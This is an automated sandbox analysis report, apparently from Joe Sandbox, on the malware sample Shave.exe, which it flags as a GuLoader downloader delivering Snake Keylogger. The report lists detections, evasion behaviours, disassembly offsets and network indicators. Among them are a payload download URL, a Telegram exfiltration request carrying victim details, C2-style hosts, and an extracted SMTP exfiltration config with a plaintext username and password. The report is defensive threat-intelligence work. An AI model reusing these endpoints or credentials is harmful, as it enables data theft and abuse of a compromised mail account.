Windows Analysis Report
Shave.exe

Overview

General Information

Sample name: Shave.exe
Analysis ID: 1562047
MD5: 51000c141b602569cf44b0f8bec9ecb8
SHA1: d7b819dbc26b3e66c99d233c5c7fc86492e626dd
SHA256: 5b19a26d6e86bbcd6d454baee6ae7c77f1c4ca6017ad965eb79098308346f383
Tags: exe, GuLoader, user-abuse_ch

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mukesh@cipmach.com", "Password": "mail@2019$", "Host": "mail.cipmach.com", "Port": "587", "Version": "4.4"}
Source: Shave.exe Virustotal: Detection: 45%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Shave.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: Shave.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49771 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2
Source: Shave.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00402868 FindFirstFileW, 3_2_00402868
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004065DA FindFirstFileW,FindClose, 3_2_004065DA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 3_2_004059A9
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 0015F45Dh 3_2_0015F2C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 0015F45Dh 3_2_0015F4AC
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 0015F45Dh 3_2_0015F52F
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 0015FC19h 3_2_0015F974
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0ECA6h 3_2_04B0E9D8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B09280h 3_2_04B08FB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B07EB5h 3_2_04B07B78
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0E386h 3_2_04B0E0B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B00741h 3_2_04B00498
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then mov esp, ebp 3_2_04B0B081
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B06733h 3_2_04B06488
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B00B99h 3_2_04B008F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0C396h 3_2_04B0C0C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B062D9h 3_2_04B06030
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0BF06h 3_2_04B0BC38
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0DEF6h 3_2_04B0DC28
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B032B1h 3_2_04B03008
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B03709h 3_2_04B03460
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B002E9h 3_2_04B00040
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B01449h 3_2_04B011A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B018A1h 3_2_04B015F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0CCB6h 3_2_04B0C9E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0C826h 3_2_04B0C558
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B00FF1h 3_2_04B00D48
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0E816h 3_2_04B0E548
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B02151h 3_2_04B01EA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0F5C6h 3_2_04B0F2F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B05179h 3_2_04B04ED0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B07571h 3_2_04B072C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B048C9h 3_2_04B04620
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B06CC1h 3_2_04B06A18
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B07119h 3_2_04B06E70
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B04D21h 3_2_04B04A78
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0D146h 3_2_04B0CE78
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0F136h 3_2_04B0EE68
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B01CF9h 3_2_04B01A50
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B02E59h 3_2_04B02BB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0BA76h 3_2_04B0B7A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0DA66h 3_2_04B0D798
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B05A29h 3_2_04B05780
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0FA56h 3_2_04B0F788
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B05E81h 3_2_04B05BD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B079C9h 3_2_04B07720
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B055D1h 3_2_04B05328
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0B5E6h 3_2_04B0B318
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B025A9h 3_2_04B02300
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B0D5D6h 3_2_04B0D308
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B02A01h 3_2_04B02758
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B36970h 3_2_04B36678
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B36347h 3_2_04B35FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3FDA8h 3_2_04B3FAB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B35986h 3_2_04B356B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B38FB0h 3_2_04B38CB8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3A798h 3_2_04B3A4A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3154Eh 3_2_04B31280
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B32756h 3_2_04B32488
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3BF80h 3_2_04B3BC88
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3B5F0h 3_2_04B3B2F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3CDD8h 3_2_04B3CAE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3079Eh 3_2_04B304D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B377C8h 3_2_04B374D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B33996h 3_2_04B336C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3E5C0h 3_2_04B3E2C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3B128h 3_2_04B3AE30
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B33506h 3_2_04B33238
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B354F6h 3_2_04B35228
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3C910h 3_2_04B3C618
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3E0F8h 3_2_04B3DE00
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B37300h 3_2_04B37008
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3D768h 3_2_04B3D470
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B34746h 3_2_04B34478
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B38158h 3_2_04B37E60
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3EF50h 3_2_04B3EC58
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3030Eh 3_2_04B30040
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B39940h 3_2_04B39648
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B31E47h 3_2_04B31BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B33076h 3_2_04B32DA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3D2A0h 3_2_04B3CFA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3EA88h 3_2_04B3E790
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B35066h 3_2_04B34D98
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B37C90h 3_2_04B37998
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B39478h 3_2_04B39180
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B310BEh 3_2_04B30DF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B38AE8h 3_2_04B387F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B322C6h 3_2_04B31FF8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B342B6h 3_2_04B33FE8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3F8E0h 3_2_04B3F5E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3A2D0h 3_2_04B39FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3BAB8h 3_2_04B3B7C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3DC30h 3_2_04B3D938
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3F418h 3_2_04B3F120
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B38620h 3_2_04B38328
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B319DEh 3_2_04B31710
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B39E08h 3_2_04B39B10
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B32BE6h 3_2_04B32918
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B34BD7h 3_2_04B34908
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B30C2Eh 3_2_04B30960
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3AC60h 3_2_04B3A968
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B3C448h 3_2_04B3C150
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B33E26h 3_2_04B33B58
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B36E38h 3_2_04B36B40
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04B35E16h 3_2_04B35B48
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E41FE8h 3_2_04E41CF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E41190h 3_2_04E40E98
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E40338h 3_2_04E40040
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E41B20h 3_2_04E41828
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E40CC8h 3_2_04E409D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E41658h 3_2_04E41360
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 04E40801h 3_2_04E40508
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then push 00000000h 3_2_379F50C7
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_379F0A10
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_379F0A01
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 3_2_379F0D26
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 38312C19h 3_2_38312968
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831DC51h 3_2_3831D9A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 383131E0h 3_2_38312DC8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831E0A9h 3_2_3831DE00
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831FAB9h 3_2_3831F810
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_38310040
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831CF49h 3_2_3831CCA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831D3A1h 3_2_3831D0F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 383131E0h 3_2_3831310E
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831D7F9h 3_2_3831D550
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 383131E0h 3_2_38312DC2
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831E501h 3_2_3831E258
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831E959h 3_2_3831E6B0
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 38310D0Dh 3_2_38310B30
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 38311697h 3_2_38310B30
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831EDB1h 3_2_3831EB08
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831F209h 3_2_3831EF60
Source: C:\Users\user\Desktop\Shave.exe Code function: 4x nop then jmp 3831F661h 3_2_3831F3B8

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.5:49886 -> 199.79.63.24:587
Source: global traffic HTTP traffic detected (8 identical requests): GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2026/11/2024%20/%2019:05:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 185.244.144.68
Source: Joe Sandbox View IP Address: 193.122.130.0
Source: Joe Sandbox View ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49751 -> 185.244.144.68:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49779 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49757 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49777 -> 172.67.177.134:443
Source: global traffic HTTP traffic detected: GET /oxzGOftLtQcGlWZ214.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: mertvinc.com.tr | Cache-Control: no-cache
Source: global traffic HTTP traffic detected (7 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected (3 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49771 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (7 occurrences)
Source: global traffic DNS traffic detected: DNS query: mertvinc.com.tr
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.cipmach.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 25 Nov 2024 06:09:27 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Shave.exe, 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Shave.exe, 00000003.00000002.3299164468.00000000352A4000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035283000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003529A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.cipmach.com
Source: Shave.exe, 00000003.00000002.3280053840.00000000066D0000.00000004.00001000.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin
Source: Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin6
Source: Shave.exe, 00000003.00000002.3279604982.0000000004B78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.binQ
Source: Shave.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Shave.exe, 00000003.00000002.3299164468.00000000352F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Shave.exe, 00000003.00000002.3299164468.00000000352EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003517D000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Shave.exe, 00000003.00000002.3299164468.000000003517D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: Shave.exe, 00000003.00000002.3299164468.00000000351A8000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Shave.exe, 00000003.00000002.3299164468.0000000035322000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035313000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Shave.exe, 00000003.00000002.3299164468.000000003531D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
